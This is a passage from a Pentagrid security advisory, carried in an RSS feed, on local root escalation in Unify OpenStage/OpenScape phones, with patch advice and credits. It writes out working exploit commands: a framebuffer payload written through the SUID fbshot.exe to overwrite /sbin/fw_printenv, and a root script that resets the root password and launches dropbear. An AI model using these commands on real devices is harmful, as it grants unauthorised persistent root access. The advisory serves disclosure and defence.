#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)&lt;/pre&gt;
&lt;p&gt;The attacker creates a file containing this payload, dumps it into the framebuffer and uses the &lt;code class="docutils literal"&gt;fbshot.exe&lt;/code&gt;. Because of its SUID bit, even files belonging to the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user and a privileged group can be overwritten.&lt;/p&gt;
&lt;pre class="literal-block"&gt;cat payload &amp;gt; /dev/fb0 ; /Opera_Deploy/appWeb/web/fbshot.exe /sbin/fw_printenv&lt;/pre&gt;
&lt;p&gt;The &lt;code class="docutils literal"&gt;/sbin/fw_printenv&lt;/code&gt; file is now a BMP file which includes the payload. The program file's flags and ownership is preserved. The file still has the SetUID bit set. With the specific framebuffer content, the BMP is a valid script and will run &lt;code class="docutils literal"&gt;/home/admin/myscript&lt;/code&gt;. After a reboot the phone executes the &lt;code class="docutils literal"&gt;/sbin/fw_printenv&lt;/code&gt; and in consequence &lt;code class="docutils literal"&gt;/home/admin/myscript&lt;/code&gt; as &lt;code class="docutils literal"&gt;root&lt;/code&gt;. In order to gain permanent &lt;code class="docutils literal"&gt;root&lt;/code&gt; access the &lt;code class="docutils literal"&gt;myscript&lt;/code&gt; file can be defined as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;#!/bin/sh
/Opera_Deploy/setPasswd.sh root 123456
dropbear&lt;/pre&gt;
&lt;p&gt;Using a well-crafted payload and replacing the right files, an attacker might be able to gain &lt;code class="docutils literal"&gt;root&lt;/code&gt; access without a proxy &lt;code class="docutils literal"&gt;myscript&lt;/code&gt; file and without rebooting.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-4"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs code execution permission on the phone, for example via SSH access.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="proof-of-concept-exploit"&gt;
&lt;h2&gt;Proof of concept exploit&lt;/h2&gt;
&lt;p&gt;Pentagrid developed a proof of concept exploit, which is published on &lt;a class="reference external" href="https://github.com/pentagridsec/openstage-exploit-chain"&gt;Github&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="patches-and-workaround"&gt;
&lt;h2&gt;Patches and Workaround&lt;/h2&gt;
&lt;p&gt;Pentagrid recommends to update to a recent firmware version as documented in Unify's advisory &lt;a class="reference external" href="https://networks.unify.com/security/advisories/OBSO-2312-01.pdf"&gt;OBSO-2312-01&lt;/a&gt;. Furthermore, it is necessary to enable the so-called "secure mode", which activates certificate verification. Just activating all possible certificate checks via the web-based management does not activate the secure mode. It requires to set up a DLS, install a certificate authority, deploy certificates to phones and then to enable the secure mode.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;These vulnerabilities have been found by Michael Oelke and Martin Schobert (Pentagrid).&lt;/p&gt;
&lt;/section&gt;</description><guid>https://www.pentagrid.ch/de/blog/rce-and-local-root-in-openstage-and-openscape-phones/</guid><pubDate>Fri, 08 Dec 2023 05:42:00 GMT</pubDate></item></channel></rss>